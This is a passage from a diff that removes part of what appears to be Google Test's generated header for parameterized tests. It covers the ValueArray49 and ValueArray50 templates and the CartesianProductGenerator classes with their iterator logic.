-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
-  const T48 v48_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-class ValueArray49 {
- public:
-  ValueArray49(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47, T48 v48,
-      T49 v49) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41), v42_(v42), v43_(v43), v44_(v44),
-      v45_(v45), v46_(v46), v47_(v47), v48_(v48), v49_(v49) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_),
-        static_cast<T>(v48_), static_cast<T>(v49_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray49& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
-  const T48 v48_;
-  const T49 v49_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-class ValueArray50 {
- public:
-  ValueArray50(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-      T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-      T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-      T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47, T48 v48, T49 v49,
-      T50 v50) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19), v20_(v20),
-      v21_(v21), v22_(v22), v23_(v23), v24_(v24), v25_(v25), v26_(v26),
-      v27_(v27), v28_(v28), v29_(v29), v30_(v30), v31_(v31), v32_(v32),
-      v33_(v33), v34_(v34), v35_(v35), v36_(v36), v37_(v37), v38_(v38),
-      v39_(v39), v40_(v40), v41_(v41), v42_(v42), v43_(v43), v44_(v44),
-      v45_(v45), v46_(v46), v47_(v47), v48_(v48), v49_(v49), v50_(v50) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_),
-        static_cast<T>(v21_), static_cast<T>(v22_), static_cast<T>(v23_),
-        static_cast<T>(v24_), static_cast<T>(v25_), static_cast<T>(v26_),
-        static_cast<T>(v27_), static_cast<T>(v28_), static_cast<T>(v29_),
-        static_cast<T>(v30_), static_cast<T>(v31_), static_cast<T>(v32_),
-        static_cast<T>(v33_), static_cast<T>(v34_), static_cast<T>(v35_),
-        static_cast<T>(v36_), static_cast<T>(v37_), static_cast<T>(v38_),
-        static_cast<T>(v39_), static_cast<T>(v40_), static_cast<T>(v41_),
-        static_cast<T>(v42_), static_cast<T>(v43_), static_cast<T>(v44_),
-        static_cast<T>(v45_), static_cast<T>(v46_), static_cast<T>(v47_),
-        static_cast<T>(v48_), static_cast<T>(v49_), static_cast<T>(v50_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray50& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-  const T21 v21_;
-  const T22 v22_;
-  const T23 v23_;
-  const T24 v24_;
-  const T25 v25_;
-  const T26 v26_;
-  const T27 v27_;
-  const T28 v28_;
-  const T29 v29_;
-  const T30 v30_;
-  const T31 v31_;
-  const T32 v32_;
-  const T33 v33_;
-  const T34 v34_;
-  const T35 v35_;
-  const T36 v36_;
-  const T37 v37_;
-  const T38 v38_;
-  const T39 v39_;
-  const T40 v40_;
-  const T41 v41_;
-  const T42 v42_;
-  const T43 v43_;
-  const T44 v44_;
-  const T45 v45_;
-  const T46 v46_;
-  const T47 v47_;
-  const T48 v48_;
-  const T49 v49_;
-  const T50 v50_;
-};
-
-# if GTEST_HAS_COMBINE
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Generates values from the Cartesian product of values produced
-// by the argument generators.
-//
-template <typename T1, typename T2>
-class CartesianProductGenerator2
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2> > {
- public:
-  typedef ::testing::tuple<T1, T2> ParamType;
-
-  CartesianProductGenerator2(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2)
-      : g1_(g1), g2_(g2) {}
-  virtual ~CartesianProductGenerator2() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current2_;
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator2::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator2& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-};  // class CartesianProductGenerator2
-
-
-template <typename T1, typename T2, typename T3>
-class CartesianProductGenerator3
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3> ParamType;
-
-  CartesianProductGenerator3(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3)
-      : g1_(g1), g2_(g2), g3_(g3) {}
-  virtual ~CartesianProductGenerator3() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current3_;
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator3::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator3& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-};  // class CartesianProductGenerator3
-
-
-template <typename T1, typename T2, typename T3, typename T4>
-class CartesianProductGenerator4
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4> ParamType;
-
-  CartesianProductGenerator4(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4) {}
-  virtual ~CartesianProductGenerator4() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current4_;
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator4::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator4& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-};  // class CartesianProductGenerator4
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-class CartesianProductGenerator5
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5> ParamType;
-
-  CartesianProductGenerator5(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5) {}
-  virtual ~CartesianProductGenerator5() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current5_;
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator5::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator5& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-};  // class CartesianProductGenerator5
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-class CartesianProductGenerator6
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5,
-        T6> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6> ParamType;
-
-  CartesianProductGenerator6(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6) {}
-  virtual ~CartesianProductGenerator6() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
